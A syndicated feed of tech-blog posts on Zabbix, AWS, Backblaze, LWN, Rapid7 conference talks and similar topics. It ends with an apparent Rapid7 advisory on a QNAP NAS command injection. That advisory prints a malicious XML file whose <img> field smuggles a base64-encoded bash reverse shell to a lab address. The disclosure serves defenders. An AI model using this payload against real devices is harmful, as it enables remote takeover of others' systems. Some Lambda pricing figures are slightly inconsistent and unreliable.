What’s Up, Home? – Living Inside an Audio Bubble

Post Syndicated from Janne Pikkarainen original https://blog.zabbix.com/whats-up-home-living-inside-an-audio-bubble/22541/

Can you monitor your Bluetooth headset usage hours with Zabbix? Of course, you can!

By day, I earn living by being a monitoring tech lead in a global cyber security company. By night, I monitor my home with Zabbix and Grafana and do some weird experiments with them. Welcome to my weekly blog about how I monitor my home.

I adjust and tweak myself with the power of music. Finding out the root cause for a severe outage or just fixing some less severe error becomes much more epic if I listen to Hans Zimmer’s music. Trance, drum ‘n bass, demoscene music, and retro gaming music keep me afloat if I have something simple, repetitive things to do. For some reason I write each and every of these home monitoring entries with the soundtrack from the latest Batman movie playing background, and so forth.

My music listening habits, the online meetings at work, and the fact that I mostly work from home, just like my wife, means that I use my Valco headphones several hours a day. Valco claims that their headset can provide about 40 hours runtime with a single charge, and that kind of must be true as I only charge the headset on Sundays for them to be ready for a new week on Monday morning.

But how much do I really use my Valcos? Zabbix to the rescue!

Mac to Valco, Mac to Valco, please respond

As I use my headset mostly with a MacBook, I needed to find out how to get the connection status info from macOS command line. I am sure there are more sophisticated ways of doing this, but the sledgehammer method I used is good enough for my home use.

On macOS, system_profiler command gives you back tons of data, one of the elements being the Bluetooth devices. Sure enough, my Valco headset is visible there, and so is the connection status.

Now that I have the data available, I could send all this text output to Zabbix and use Zabbix item pre-processing. This morning (yes, I created this whole thing only two-three hours ago) I did something else though.

You know, while I was testing if my attempt works in real-time, I created a terrible shell one-liner, which I now also use with Zabbix.

system_profiler SPBluetoothDataType 2>/dev/null | grep -A10 “Valcoitus Bass:” | grep “Connected:” | cut -d ‘:’ -f2 | xargs -I ‘{}’ zabbix_sender -z my.zabbix.server -s “Zabbix server” -k valco.connected -o ‘{}’

Beautiful? No. Does it work? Yes. If I remove the zabbix_sender part, this is what happens: it returns “Yes” or “No”, indicating if my headphones are connected or not.

In other words, theoretically, this tells if my headset is powered on and if I am using them. In practice, I could of course have forgotten to turn the headset off, but that really does not happen.

My MacBook now runs the one-liner every minute via a cron job, so my Zabbix receives the data in near-enough real-time.

Zabbix time!

All my efforts and the zabbix_sender command are no good if I don’t do something on the Zabbix side, too.

With zabbix_sender, you need to set up a Zabbix trapper item on Zabbix. It’s really not rocket science, check this out:

But wait! My shell responded back “Yes” or “No”, but the Type of information is set to numeric. Am I stupid? Careless? No. There’s also some preprocessing involved.

I changed the values to be numeric so I can get fancier with Grafana later on; with numeric data, I can get better statistics about how much I actually do use my headphones and get really creative.

Does it work?

Of course, it does. Here are some latest data:

… and here’s a graph:

I will tell you next week how many hours I have spent inside my active noise-cancelling bubble. Probably too many, any ear doctor would tell me.

I have been working at Forcepoint since 2014 and without music, would be way less productive. — Janne Pikkarainen

This post was originally published on the author’s LinkedIn account.

The post What’s Up, Home? – Living Inside an Audio Bubble appeared first on Zabbix Blog.

Announcing Backblaze B2 Virtual User Group – Come Join Us!

Post Syndicated from Greg Hamer original https://www.backblaze.com/blog/announcing-backblaze-b2-virtual-user-group-come-join-us/


Please join us on the third Wednesday of each month at 10 a.m. Pacific time for the free worldwide Backblaze B2 Virtual User Group!

At Backblaze, we work hard to make Backblaze B2 Cloud Storage as easy to implement as possible. However, what is easy for some can be a challenge for others. Wouldn’t it be great if you could have a forum where experienced professionals walk you through the best ways to fully leverage the power of Backblaze B2 Cloud Storage? Or have an open supportive meetup where you can ask questions and get answers from others that can share tips on their successes and failures with you?

To help make it easier for Backblaze B2 users to succeed, we are launching a free monthly Backblaze B2 Virtual User Group.

How to Sign Up for the Backblaze B2 Virtual User Group

If you think this user group may be of interest, please sign up using the form on the user group home page. Since our user group is an open community, registration for our meetings is not mandatory. However, signing up will help us keep you up to date about upcoming meetings and help us better address the needs of the community. Also, individuals who sign up will be added to a private, members-only Slack channel where user group members can communicate with each other easily outside of meetings.

Another option for you is to just bookmark the user group homepage and watch for meeting dates, topics and get the public “Meeting Room Link,” Attending as an observer is OK, too.

What to Expect at the Virtual User Group:

No matter where you are, this user group is for you. As a worldwide virtual user group, all you need to have is the link for the monthly meeting currently scheduled for the third Wednesday of each month at 10 a.m. Pacific time and you are good to go. It’s that easy!

Typically, meetings will have 1 hour and 15 minutes of content.

Backblaze team members will attend each meeting, so attending user group meetings will be a great way to get direct access to Backblaze’s technical personnel who deliver world-class Backblaze B2 Cloud Storage for you.

Because Backblaze B2 Cloud Storage is versatile and there are so many use cases, each meeting will focus on a different topic. Please check our user group home page and just join those meetings that are of interest to you. For our initial three meetings, we will focus first on developers, then on media and entertainment hosting and storage, and later on backup and archive.

Additional topics will be announced in the months ahead on our user group home page. If you have a topic not covered in our initial meetings, please let your voice be heard and mention it now in a comment below.

Why You Should Come

These virtual user group meetings will be a great way for you to meet and hear from people who successfully deliver solutions that you may want to better deliver or improve on your team’s workloads.

If you have solutions or helpful use cases you would be willing to share with others, our Backblaze Evangelism team is eager to hear from you.

You now have your official invitation! So please join our user community! We look forward to meeting you at our next user group meeting.

If you know anyone who may be interested in joining our user group meetings, we would appreciate your sharing this announcement with them.

Blaze on!

The post Announcing Backblaze B2 Virtual User Group – Come Join Us! appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

[$] 6.0 Merge window, part 1

Post Syndicated from original https://lwn.net/Articles/903487/

The merge window for the kernel that will probably be called “6.0” has
gotten off to a strong start, with 6,820 non-merge changesets pulled into
the mainline repository in the first few days. The work pulled so far
makes changes all over the kernel tree; read on for a summary of what has
happened in the first half of this merge window.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/903997/

Security updates have been issued by CentOS (firefox, thunderbird, and xorg-x11-server), Debian (xorg-server), Gentoo (Babel, go, icingaweb2, lib3mf, and libmcpp), Oracle (389-ds:1.4, go-toolset:ol8, httpd, mariadb:10.5, microcode_ctl, and ruby:2.5), Red Hat (xorg-x11-server), Scientific Linux (xorg-x11-server), SUSE (buildah, go1.17, go1.18, harfbuzz, python-ujson, qpdf, u-boot, and wavpack), and Ubuntu (gnutls28, libxml2, mod-wsgi, openjdk-8, openjdk-8, openjdk-lts, openjdk-17, openjdk-18, and python-django).

Web application access control patterns using AWS services

Post Syndicated from Zili Gao original https://aws.amazon.com/blogs/architecture/web-application-access-control-patterns-using-aws-services/

The web application client-server pattern is widely adopted. The access control allows only authorized clients to access the backend server resources by authenticating the client and providing granular-level access based on who the client is.

This post focuses on three solution architecture patterns that prevent unauthorized clients from gaining access to web application backend servers. There are multiple AWS services applied in these architecture patterns that meet the requirements of different use cases.

OAuth 2.0 authentication code flow

Figure 1 demonstrates the fundamentals to all the architectural patterns discussed in this post. The blog Understanding Amazon Cognito user pool OAuth 2.0 grants describes the details of different OAuth 2.0 grants, which can vary the flow to some extent.

A typical OAuth 2.0 authentication code flow

Figure 1. A typical OAuth 2.0 authentication code flow

The architecture patterns detailed in this post use Amazon Cognito as the authorization server, and Amazon Elastic Compute Cloud instance(s) as resource server. The client can be any front-end application, such as a mobile application, that sends a request to the resource server to access the protected resources.

Pattern 1

Figure 2 is an architecture pattern that offloads the work of authenticating clients to Application Load Balancer (ALB).

Application Load Balancer integration with Amazon Cognito

Figure 2. Application Load Balancer integration with Amazon Cognito

ALB can be used to authenticate clients through the user pool of Amazon Cognito:

  1. The client sends HTTP request to ALB endpoint without authentication-session cookies.
  2. ALB redirects the request to Amazon Cognito authentication endpoint. The client is authenticated by Amazon Cognito.
  3. The client is directed back to the ALB with the authentication code.
  4. The ALB uses the authentication code to obtain the access token from the Amazon Cognito token endpoint and also uses the access token to get client’s user claims from Amazon Cognito UserInfo endpoint.
  5. The ALB prepares the authentication session cookie containing encrypted data and redirects client’s request with the session cookie. The client uses the session cookie for all further requests. The ALB validates the session cookie and decides if the request can be passed through to its targets.
  6. The validated request is forwarded to the backend instances with the ALB adding HTTP headers that contain the data from the access token and user-claims information.
  7. The backend server can use the information in the ALB added headers for granular-level permission control.

The key takeaway of this pattern is that the ALB maintains the whole authentication context by triggering client authentication with Amazon Cognito and prepares the authentication-session cookie for the client. The Amazon Cognito sign-in callback URL points to the ALB, which allows the ALB access to the authentication code.

More details about this pattern can be found in the documentation Authenticate users using an Application Load Balancer.

Pattern 2

The pattern demonstrated in Figure 3 offloads the work of authenticating clients to Amazon API Gateway.

Amazon API Gateway integration with Amazon Cognito

Figure 3. Amazon API Gateway integration with Amazon Cognito

API Gateway can support both REST and HTTP API. API Gateway has integration with Amazon Cognito, whereas it can also have control access to HTTP APIs with a JSON Web Token (JWT) authorizer, which interacts with Amazon Cognito. The ALB can be integrated with API Gateway. The client is responsible for authenticating with Amazon Cognito to obtain the access token.

  1. The client starts authentication with Amazon Cognito to obtain the access token.
  2. The client sends REST API or HTTP API request with a header that contains the access token.
  3. The API Gateway is configured to have:
    • Amazon Cognito user pool as the authorizer to validate the access token in REST API request, or
    • A JWT authorizer, which interacts with the Amazon Cognito user pool to validate the access token in HTTP API request.
  4. After the access token is validated, the REST or HTTP API request is forwarded to the ALB, and:
    • The API Gateway can route HTTP API to private ALB via a VPC endpoint.
    • If a public ALB is used, the API Gateway can route both REST API and HTTP API to the ALB.
  5. API Gateway cannot directly route REST API to a private ALB. It can route to a private Network Load Balancer (NLB) via a VPC endpoint. The private ALB can be configured as the NLB’s target.

The key takeaways of this pattern are:

  • API Gateway has built-in features to integrate Amazon Cognito user pool to authorize REST and/or HTTP API request.
  • An ALB can be configured to only accept the HTTP API requests from the VPC endpoint set by API Gateway.

Pattern 3

Amazon CloudFront is able to trigger AWS Lambda functions deployed at AWS edge locations. This pattern (Figure 4) utilizes a feature of Lambda@Edge, where it can act as an authorizer to validate the client requests that use an access token, which is usually included in HTTP Authorization header.

Using Amazon CloudFront and AWS Lambda@Edge with Amazon Cognito

Figure 4. Using Amazon CloudFront and AWS Lambda@Edge with Amazon Cognito

The client can have an individual authentication flow with Amazon Cognito to obtain the access token before sending the HTTP request.

  1. The client starts authentication with Amazon Cognito to obtain the access token.
  2. The client sends a HTTP request with Authorization header, which contains the access token, to the CloudFront distribution URL.
  3. The CloudFront viewer request event triggers the launch of the function at Lambda@Edge.
  4. The Lambda function extracts the access token from the Authorization header, and validates the access token with Amazon Cognito. If the access token is not valid, the request is denied.
  5. If the access token is validated, the request is authorized and forwarded by CloudFront to the ALB. CloudFront is configured to add a custom header with a value that can only be shared with the ALB.
  6. The ALB sets a listener rule to check if the incoming request has the custom header with the shared value. This makes sure the internet-facing ALB only accepts requests that are forwarded by CloudFront.
  7. To enhance the security, the shared value of the custom header can be stored in AWS Secrets Manager. Secrets Manager can trigger an associated Lambda function to rotate the secret value periodically.
  8. The Lambda function also updates CloudFront for the added custom header and ALB for the shared value in the listener rule.

The key takeaways of this pattern are:

  • By default, CloudFront will remove the authorization header before forwarding the HTTP request to its origin. CloudFront needs to be configured to forward the Authorization header to the origin of the ALB. The backend server uses the access token to apply granular levels of resource access permission.
  • The use of Lambda@Edge requires the function to sit in us-east-1 region.
  • The CloudFront-added custom header’s value is kept as a secret that can only be shared with the ALB.

Conclusion

The architectural patterns discussed in this post are token-based web access control methods that are fully supported by AWS services. The approach offloads the OAuth 2.0 authentication flow from the backend server to AWS services. The services managed by AWS can provide the resilience, scalability, and automated operability for applying access control to a web application.

Building Cybersecurity KPIs for Business Leaders and Stakeholders

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/08/05/building-cybersecurity-kpis-for-business-leaders-and-stakeholders/

Building Cybersecurity KPIs for Business Leaders and Stakeholders

In the final part of our “Hackers ‘re Gonna Hack” series, we’re discussing how to bring together parts one and two of operationalising cybersecurity together into an overall strategy for your organisation, measured by key performance indicators (KPIs).

In part one, we spoke about the problem, which is the increasing cost (and risk) of cybersecurity, and proposed some solutions for making your budget go further.

In part two, we spoke about the foundational components of a target operating model and what that could look like for your business. In the third installment of our webinar series, we summarise the foundational elements required to keep pace with the changing threat landscape. In this talk, Jason Hart, Rapid7’s Chief Technology Officer for EMEA, discussed how to facilitate a move to a targeted operational model from your current operating model, one that is understood by all and leveraging KPIs the entire business will understand.

First, determine your current operating model

With senior stakeholders looking to you to help them understand risk and exposure, now is the time to highlight what you’re trying to achieve through your cybersecurity efforts. However, the reality is that most organisations have no granular visibility of their current operating model or even their approach to cybersecurity. A significant amount of money is likely being spent on deployment of technology across the organisation, which in turn garners a large amount of complex data. Yet, for the most part, security leaders find it hard to translate that data into something meaningful for their business leaders to understand.

In creating cyber KPIs, it’s important they are formed as part of a continual assessment of cyber maturity within your organisation. That means determining what business functions would have the most significant impact if they were compromised. Once you have discovered these functions, you can identify your essential data and locations, creating and attaching KPIs to the core six foundations we spoke of in part two. This will allow you to assess your level of maturity to determine your current operating model and begin setting KPIs to understand where you need to go to reach your target operating model.

Focus on 3 priority foundations

However, we all know cybersecurity is a wide-ranging discipline, making it a complex challenge that requires a holistic approach. It’s not possible to simply focus on one aspect and expect to be successful. We advise that, to begin with, security leaders consider three priority foundations: culture, measurement, and accountability.

For cybersecurity to have a positive and successful impact, we need to change our stakeholders’ mindsets to make it part of organisational culture. Everyone needs to understand its importance and why it’s necessary. We can’t simply assume everyone knows what is essential and that they’ll act. Instead, we need to measure our progress towards improving cybersecurity and hold people accountable for their efforts.

Translate cybersecurity problems into business problems

Cybersecurity problems are fundamentally business problems. That’s why it’s essential to translate them into business terms by creating KPIs for measuring the effectiveness of your cyber initiatives.

These KPIs can help you and your stakeholders understand where your organisation needs improvements, so you can develop a plan everyone understands. The core components that drive the effectiveness of a KPI, begin with defining the target, the owner, and accountability. The target is the business function or system that needs improvement. The owner is responsible for implementing the programme or meeting the KPI. Accountability is defined as who will review the data regularly to ensure progress towards achieving desired results.

40% of our webinar’s audience said they don’t currently use cybersecurity KPIs.

Additionally, when developing KPIs, it’s crucial to think about what information you’ll need to collect for them to be effective in helping you achieve your goals. KPIs are great, but to be successful, they need data. And once data is being fed into the KPIs, as security leaders, we need to translate the “technical stuff” – that is, talk about it in a way the business understands.

Remember, it’s about people, processes, and technology. Technology provides the data; processes are the glue that brings it together and makes cybersecurity part of the business process. And the people element is about taking the organisation on a journey. We need to present our KPIs in a way the organisation will understand to stakeholders who are both technical and non-technical.

Share and build the journey

As a security leader, you need to drive your company’s cybersecurity strategy and deploy it across all levels of your organisation, from the boardroom to the front lines of customer experience. However, we know that the approach we’re taking today isn’t working, as highlighted by the significant amounts of money we’re trying to throw at the problem.

So we need to take a different approach, going from a current to a target operating model, underpinned by KPIs that are further underpinned by data to take you in the direction you need to go. Not only will it reduce your organisational risk, but it will reduce your operational costs, too. But more importantly, it will translate what’s a very technical industry into a way everyone in your organisation will understand. It’s about a journey.

To find out what tools, processes, methodologies, and KPIs are needed to articulate key cybersecurity goals and objectives while illustrating ROI and keeping stakeholders accountable, watch part three of “Cybersecurity Series: Hackers ‘re Gonna Hack.”

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Introducing tiered pricing for AWS Lambda

Post Syndicated from Sam Dengler original https://aws.amazon.com/blogs/compute/introducing-tiered-pricing-for-aws-lambda/

This blog post is written by Heeki Park, Principal Solutions Architect, Serverless.

AWS Lambda charges for on-demand function invocations based on two primary parameters: invocation requests and compute duration, measured in GB-seconds. If you configure additional ephemeral storage for your function, Lambda also charges for ephemeral storage duration, measured in GB-seconds.

AWS continues to find ways to help customers reduce cost for running on Lambda. In February 2020, AWS announced that AWS Lambda would participate in Compute Savings Plans. In December 2020, AWS announced 1 ms billing granularity to help customers save on cost for their Lambda function invocations. With that pricing change, customers whose function duration is less than 100 ms pay less for those function invocations. In September 2021, AWS announced Graviton2 support for running your function on ARM and potential improvements for price performance for compute.

Today, AWS introduces tiered pricing for Lambda. With tiered pricing, customers who run large workloads on Lambda can automatically save on their monthly costs. Tiered pricing is based on compute duration measured in GB-seconds. The tiered pricing breaks down as follows:

Compute duration (GB-seconds) Architecture New tiered discount
0 – 6 billion x86 Same as today
6 – 15 billion x86 10%
Anything over 15 billion x86 20%
0 – 7.5 billion arm64 Same as today
7.5 – 18.75 billion arm64 10%
Anything over 18.75 billion arm64 20%

The Lambda pricing page lists the pricing for all Regions and architectures.

Tiered pricing discount example

Consider a financial services provider who provides on-demand stock portfolio analysis. The customers pay per portfolio analyzed and find the service valuable for providing them insight into the performance of those assets. The application is built using Lambda, runs on x86, and is optimized to use 2048 MB (2 GB) of memory with an average function duration of 60 seconds. This current month resulted in 75 million function invocations.

Without tiered pricing, this workload costs the following:

Monthly request charges: 75M * $0.20/million = $15.00
Monthly compute duration (seconds): 75M * 60 seconds = 4.5B seconds
Monthly compute (GB-seconds): 4.5B seconds * 2 GB = 9B GB-seconds
Monthly compute duration charges: 9B GB-s * $0.0000166667/GB-s = $150,000.30
Total monthly charges = request charges + compute duration charges = $15.00 + $150,000.30 = $150,015.30

With tiered pricing, the portion of compute duration that exceeds 6B GB-seconds receives an automatic discount as follows:

Monthly request charges: 75M * $0.20/million = $15.00
Monthly compute duration (seconds): 75M * 60 seconds = 4.5B seconds
Monthly compute (GB-seconds): 4.5B seconds * 2GB = 9B GB-seconds
Monthly compute duration charge (tier 1): 6B Gb-s * $0.0000166667/GB-s = $100,000.20
Monthly compute duration charge (tier 2): 3B Gb-s * $0.0000150000/GB-s = $45,000.09
Monthly compute duration charges (post-discount): $100,000.20 + $45,000.09 = $145,000.29.
Total monthly charges = request charges + compute duration charges = $15.00 + $145,000.29 = $145,015.29 ($5,000.01 cost savings)

Tiered pricing discount example with increased growth

The service is successful and usage in the following month quadruples, resulting in 300 million function invocations.

Without tiered pricing, this workload costs the following:

Monthly request charges: 300M * $0.20/million = $60.00
Monthly compute duration (seconds): 300M * 60 seconds = 18B seconds
Monthly compute (GB-seconds): 18B seconds * 2GB = 36B GB-seconds
Monthly compute duration charges: 36B GB-s * $0.0000166667/GB-s = $600,001.20
Total monthly charges = request charges + compute duration charges = $60.00 + $600,001.20 = $600,061.20

With tiered pricing, the compute duration portion now also exceeds 15B GB-seconds and receives an automatic discount as follows:

Monthly request charges: 300M * $0.20/million = $60.00
Monthly compute duration (seconds): 300M * 60 seconds = 18B seconds
Monthly compute (GB-seconds): 18B seconds * 2GB = 36B GB-seconds
Monthly compute duration charge (tier 1): 6B GB-s * $0.0000166667/GB-s = $100,000.02
Monthly compute duration charge (tier 2): 9B GB-s * $0.0000150000/GB-s = $135,000.27
Monthly compute duration charge (tier 3): 21B GB-s * $0.0000133333/GB-s = $280,000.56
Monthly compute duration charges (post-discount): $100,000.02 + $135,000.27 + $280,000.56 = $515,001.03.
Total monthly charges = request charges + compute duration charges = $60.00 + $515,001.03 = $515,061.03 ($85,000.17 cost savings)

Tiered pricing discount example with decreased growth

Alternatively, customers used the service less frequently than expected. As a result, usage in the following month is one-third the prior month’s usage, resulting in 25 million function invocations.

Without tiered pricing, this workload costs the following:

Monthly request charges: 25M * $0.20/million = $5.00
Monthly compute duration (seconds): 25M * 60 seconds = 1.5B seconds
Monthly compute (GB-seconds): 1.5B seconds * 2GB = 3B GB-seconds
Monthly compute duration charges: 3B GB-s * $0.0000166667/GB-s = $50,000.10
Total monthly charges = request charges + compute duration charges = $5.00 + $50,000.10 = $50,005.10

When considering tiered pricing, the compute duration portion is under 6B GB-s and is priced without any additional pricing discounts. In this case, the financial services provider did not grow the business as expected or take advantage of tiered pricing. However, they did take advantage of Lambda’s pay-as-you-go model, paying only for the compute that this application used.

Summary and other considerations

Tiered pricing for Lambda applies to the compute duration portion of your on-demand function invocations. It is specific to the architecture (x86 or arm64) and is bucketed by the Region. Refer to the previous table for the specific pricing tiers.

For example, consider a function that is using x86 architecture, deployed in both us-east-1 and us-west-2. Usage in us-east-1 is bucketed and priced separately from usage in us-west-2. If there is a function using arm64 architecture in us-east-1 and us-west-2, that function is also in a separate bucket.

The cost for invocation requests remains the same. The discount applies only to on-demand compute duration and does not apply to provisioned concurrency. Customers who also purchase Compute Savings Plans (CSPs) can take advantage of both, where Lambda applies tiered pricing first, followed by CSPs.

Conclusion

With tiered pricing for Lambda, you can save on the compute duration portion of your monthly Lambda bills. This allows you to architect, build, and run large-scale applications on Lambda and take advantage of these tiered prices automatically.

For more information on tiered pricing for Lambda, see: https://aws.amazon.com/lambda/pricing/.

GitLab plans to delete dormant projects in free accounts (Register)

Post Syndicated from original https://lwn.net/Articles/903858/

The Register reports
that GitLab is planning to start deleting repositories belonging to free
accounts if they have been inactive for at least a year.

GitLab is aware of the potential for angry opposition to the plan,
and will therefore give users weeks or months of warning before
deleting their work. A single comment, commit, or new issue posted
to a project during a 12-month period will be sufficient to keep
the project alive.

What We’re Looking Forward to at Black Hat, DEF CON, and BSidesLV 2022

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/08/04/what-were-looking-forward-to-at-black-hat-def-con-and-bsideslv-2022/

What We're Looking Forward to at Black Hat, DEF CON, and BSidesLV 2022

The week of Black Hat, DEF CON, and BSides is highly anticipated annual tradition for the cybersecurity community, a weeklong chance for security pros from all corners of the industry to meet in Las Vegas to talk shop and share what they’ve spent the last 12 months working on.

But like many beloved in-person events, 2020 and 2021 put a major damper on this tradition for the security community, known unofficially as Hacker Summer Camp. Black Hat returned in 2021, but with a much heavier emphasis than previous years on virtual events over in-person offerings, and many of those who would have attended in non-COVID times opted to take in the briefings from their home offices instead of flying out to Vegas.

This year, however, the week of Black Hat is back in action, in a form that feels much more familiar for those who’ve spent years making the pilgrimage to Vegas each August. That includes a whole lot of Rapid7 team members — it’s been a busy few years for our research and product teams alike, and we’ve got a lot to catch our colleagues up on. Here’s a sneak peek of what we have planned from August 9-12 at this all-star lineup of cybersecurity sessions.

BSidesLV

The week kicks off on Tuesday, August 9 with BSides, a two-day event running on the 9th and 10th that gives security pros, and those looking to enter the field, a chance to come together and share knowledge. Several Rapid7 presenters will be speaking at BSidesLV, including:

  • Ron Bowes, Lead Security Researcher, who will talk about the surprising overlap between spotting cybersecurity vulnerabilities and writing capture-the-flag (CTF) challenges in his presentation “From Vulnerability to CTF.”
  • Jen Ellis, Vice President of Community and Public Affairs, who will cover the ways in which ransomware and major vulnerabilities have impacted the thinking and decisions of government policymakers in her talk “Hot Topics From Policy and the DoJ.”

Black Hat

The heart of the week’s activities, Black Hat, features the highest concentration of presentations out of the three conferences. Our Research team will be leading the charge for Rapid7’s sessions, with appearances from:

  • Curt Barnard, Principal Security Researcher, who will talk about a new way to search for default credentials more easily in his session, "Defaultinator: An Open Source Search Tool for Default Credentials."
  • Spencer McIntyre, Lead Security Researcher, who’ll be covering the latest in modern attack emulation in his presentation, "The Metasploit Framework."
  • Jake Baines, Lead Security Researcher, who’ll be giving not one but two talks at Black Hat.
    • He’ll cover newly discovered vulnerabilities affecting the Cisco ASA and ASA-X firewalls in "Do Not Trust the ASA, Trojans!"
    • Then, he’ll discuss how the Rapid7 Emergent Threat Response team manages an ever-changing vulnerability landscape in "Learning From and Anticipating Emergent Threats."
  • Tod Beardsley, Director of Research, who’ll be beamed in virtually to tell us how we can improve the coordinated, global vulnerability disclosure (CVD) process in his on-demand presentation, "The Future of Vulnerability Disclosure Processes."

We’ll also be hosting a Community Celebration to welcome our friends and colleagues back to Hacker Summer Camp. Come hang out with us, play games, collect badges, and grab a super-exclusive Rapid7 Hacker Summer Camp t-shirt. Head to our Black Hat event page to preregister today!

DEF CON

Rounding out the week, DEF CON offers lots of opportunities for learning and listening as well as hands-on immersion in its series of “Villages.” Rapid7 experts will be helping run two of these Villages:

  • The IoT Village, where Principal Security Researcher for IoT Deral Heiland will take attendees through a multistep process for hardware hacking.
  • The Car Hacking Village, where Patrick Kiley, Principal Security Consultant/Research Lead, will teach you about hacking actual vehicles in a safe, controlled environment.

We’ll also have no shortage of in-depth talks from our team members, including:

  • Harley Geiger, Public Policy Senior Director, who’ll cover how legislative changes impact the way security research is carried out worldwide in his talk, "Hacking Law Is for Hackers: How Recent Changes to CFAA, DMCA, and Other Laws Affect Security Research."
  • Jen Ellis, who’ll give two talks at DEF CON:
    • "Moving Regulation Upstream: An Increasing Focus on the Role of Digital Service Providers," where she’ll discuss the challenges of drafting effective regulations in an environment where attackers often target smaller organizations that exist below the cybersecurity poverty line.
    • "International Government Action Against Ransomware," a deep dive into policy actions taken by global governments in response to the recent rise in ransomware attacks.
  • Jakes Baines, who’ll be giving his talk "Do Not Trust the ASA, Trojans!" on Saturday, August 13, in case you weren’t able to catch it earlier in the week at Black Hat.

Whew, that’s a lot — time to get your itinerary sorted. Get the full details of what we’re up to at Hacker Summer Camp, and sign up for our Community Celebration on Wednesday, August 10, at our Black Hat 2022 event page.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

QNAP Poisoned XML Command Injection (Silently Patched)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/

Background

QNAP Poisoned XML Command Injection (Silently Patched)

CVE-2020-2509 was added to CISA’s Known Exploited Vulnerabilities Catalog in April 2022, and it was listed as one of the “Additional Routinely Exploited Vulnerabilities in 2021” in CISA’s 2021 Top Routinely Exploited Vulnerabilities alert. However, CVE-2020-2509 has no public exploit, and no other organizations have publicly confirmed exploitation in the wild.

QNAP Poisoned XML Command Injection (Silently Patched)

CVE-2020-2509 is allegedly an unauthenticated remote command injection vulnerability affecting QNAP Network Attached Storage (NAS) devices using the QTS operating system. The vulnerability was discovered by SAM and publicly disclosed on March 31, 2021. Two weeks later, QNAP issued a CVE and an advisory.

Neither organization provided a CVSS vector to describe the vulnerability. QNAP’s advisory doesn’t even indicate the vulnerable component. SAM’s disclosure says they found the vulnerability when they “fuzzed” the web server’s CGI scripts (which is not generally the way you discover command injection vulnerabilities, but I digress). SAM published a proof-of-concept video that allegedly demonstrates exploitation of the vulnerability, although it doesn’t appear to be a typical straightforward command injection. The recorded exploit downloads BusyBox to establish a reverse shell, and it appears to make multiple requests to accomplish this. That’s many more moving parts than a typical command injection exploit. Regardless, beyond affected versions, there are essentially no usable details for defender or attackers in either disclosure.

Given the ridiculous amount of internet-facing QNAP NAS (350,000+), seemingly endless ransomware attacks on the systems (Qlocker, Deadbolt, and Checkmate), and the mystery surrounding alleged exploitation in the wild of CVE-2020-2509, we decided to find out exactly what CVE-2020-2509 is. Instead, we found the below, which may be an entirely new vulnerability.

Poisoned XML command injection (CVE-2022-XXXX)



QNAP Poisoned XML Command Injection (Silently Patched)

The video demonstrates exploitation of an unauthenticated and remote command injection vulnerability on a QNAP TS-230 running QTS 4.5.1.1480 (reportedly the last version affected by CVE-2020-2509). We were unable to obtain the first patched version, QTS 4.5.1.1495, but we were able to confirm this vulnerability was patched in QTS 4.5.1.1540. However, we don’t think this is CVE-2020-2509. The exploit in the video requires the attacker be a man-in-the-middle or have performed a DNS hijack of update.qnap.com. In the video, our lab network’s Mikrotik router has a malicious static DNS entry for update.qnap.com.

QNAP Poisoned XML Command Injection (Silently Patched)

SAM and QNAP’s disclosures didn’t mention any type of man-in-the-middle or DNS hijacks. But neither disclosure ruled it out either. CVSS vectors are great for this sort of thing. If either organization had published a vector with an Attack Complexity of high, we’d know this “new” vulnerability is CVE-2020-2509. If they’d published a vector with Attack Complexity of low, we’d know this “new” vulnerability is not CVE-2020-2509. The lack of a vector leaves us unsure. Only CISA’s claim of widespread exploitation leads us to believe this is not is CVE-2020-2509. However, this “new” vulnerability is still a high-severity issue. It could reasonably be scored as CVSSv3 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). While the issue was patched 15 to 20 months ago (patches for CVE-2021-2509 were released in November 2020 and April 2021), there are still thousands of internet-facing QNAP devices that remain unpatched against this “new” issue. As such, we are going to describe the issue in more detail.

Exploitation and patch

The “new” vulnerability can be broken down into two parts:

A remote and unauthenticated attacker can force a QNAP device to make an HTTP request to update.qnap.com, without using SSL, in order to download an XML file. Content from the downloaded XML file is passed to a system call without any sanitization.

Both of these issues can be found in the QNAP’s web server cgi-bin executable authLogin.cgi, but the behavior is triggered by a request to /cgi-bin/qnapmsg.cgi. Below is decompiled code from authLogin.cgi that highlights the use of HTTP to fetch a file.

QNAP Poisoned XML Command Injection (Silently Patched)

Using wget, the QNAP device will download a language-specific XML file such as http://update.qnap.com/loginad/qnapmsg_eng.xml, where eng can be a variety of different values (cze, dan, ger, spa, fre, ita, etc.). When the XML has been downloaded, the device then parses the XML file. When the parser encounters <img> tags, it will attempt to download the associated image using wget.

QNAP Poisoned XML Command Injection (Silently Patched)

The <img> value is added to a wget command without any type of sanitization, which is a very obvious command injection issue.

QNAP Poisoned XML Command Injection (Silently Patched)

The XML, if downloaded straight from QNAP, looks like the following (note that it appears to be part of an advertisement system built into the device):

<?xml version="1.0" encoding="utf-8"?>
<Root>
  <Messages>
    <Message>
      <img>http://update.qnap.com/loginad/image/1_eng.jpg</img>
      <link>http://www.qnap.com/en/index.php?lang=en&amp;sn=822&amp;c=351&amp;sc=513&amp;t=520&amp;n=18168</link>
    </Message>
    <Message>
      <img>http://update.qnap.com/loginad/image/4_eng.jpg</img>
      <link>http://www.qnap.com/en/index.php?lang=en&amp;sn=8685</link>
    </Message>
    <Message>
      <img>http://update.qnap.com/loginad/image/2_eng.jpg</img>
      <link>http://www.facebook.com/QNAPSys</link>
    </Message>
  </Messages>
</Root>

Because of the command injection issue, a malicious attacker can get a reverse shell by providing an XML file that looks like the following. The command injection is performed with backticks, and the actual payload (a bash reverse shell using /dev/tcp) is base64 encoded because / is a disallowed character.

​​<?xml version="1.0" encoding="utf-8"?>
<Root>
	<Messages>
		<Message>
			<img>/`echo -ne 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d | sh`</img>
			<link>http://www.qnap.com/></link>
		</Message>
	</Messages>
</Root>

